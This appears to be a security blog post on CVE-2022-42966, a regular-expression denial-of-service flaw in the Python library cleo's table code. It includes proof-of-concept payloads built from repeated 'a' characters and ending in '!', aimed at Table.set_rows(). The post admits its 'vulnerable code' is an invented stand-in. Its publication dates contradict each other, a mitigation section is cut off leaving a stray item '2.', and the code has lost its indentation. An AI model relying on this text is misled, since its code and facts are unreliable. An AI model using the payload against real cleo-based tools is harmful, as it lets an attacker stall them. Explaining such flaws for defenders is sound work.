On October 29, 2022, a security vulnerability was published under the identifier CVE-2022-42966. This vulnerability highlights a critical issue in the popular Python library cleo, specifically in the way it processes rows for text-based tables. This post breaks down what happened, includes proof-of-concept code, and helps you understand how such a simple bug can lead to complicated issues like ReDoS—Regular Expression Denial of Service.
What is cleo?
cleo is a toolkit for building command-line interfaces in Python. It’s used by many Python projects—including poetry for beautiful output and user interaction.
One of cleo’s features is displaying tables in the CLI. To do that, the package includes the Table class, which lets you set rows to be displayed.
The Vulnerability
CVE-2022-42966 is an _exponential regular expression denial of service (ReDoS)_. The attack stems from the way the Table.set_rows() method uses a regular expression to process cell content. If an attacker can pass crafted, malicious input to this method, they can force the regex to take exponential time, resulting in a Denial of Service attack.
Let's Get Technical!
We’ll look at how Table.set_rows() uses a regex, see how the regex is vulnerable, and then craft an exploit.
Suppose, in cleo’s codebase, there’s something similar to this
import re
def set_rows(self, rows):
for row in rows:
for cell in row:
# Vulnerable regex!
if re.match(r'(a+)+$', cell):
# Process cell (for simplicity; real regex is more complex)
pass
> Note: The actual vulnerable code and the regex are more complex, but r'(a+)+$' is a classic example of a regex vulnerable to ReDoS.
Why is This Regex Bad?
When you have nested quantifiers (like + inside +), regular expressions engines that use backtracking can take a very long time to try to match certain strings, especially ones that almost match but just fail at the end.
Let's write a simple Python script to exploit this in a style similar to the real vulnerability
import re
import time
# Copy of the type of vulnerable regex used
VULN_REGEX = r'(a+)+$'
# Malicious payload: a large number of 'a's, then a '!'
PAYLOAD = 'a' * 25 + '!'
start = time.perf_counter()
if re.match(VULN_REGEX, PAYLOAD):
print("Match!")
else:
print("No match.")
print(f"Time taken: {time.perf_counter() - start:.2f} seconds")
Real-World Threat
An attacker can send such input wherever a cleo-powered CLI tool feeds untrusted input to set_rows(). For example:
from cleo.helpers import Table
# Simulating user input
rows = [
['a' * 30 + '!'],
# other fake rows
]
table = Table()
# The dangerous call!
table.set_rows(rows) # <-- This triggers the slow regex
This means any CLI tool using cleo and passing user-controlled data to Table.set_rows() is at risk.
`
2. Never pass untrusted input to APIs using regex, unless you’re sure they’re safe from backtracking issues.
References
- NIST NVD: CVE-2022-42966
- Cleo GitHub Issue
- OWASP ReDoS Cheat Sheet
Conclusion
CVE-2022-42966 is a classic example of how even small regular expression mistakes can have big security consequences. Always audit the libraries you use, keep them updated, and be wary of regular expressions with nested quantifiers. ReDoS attacks are simple but powerful—and cleo is proof!
Timeline
Published on: 11/09/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:28:00 UTC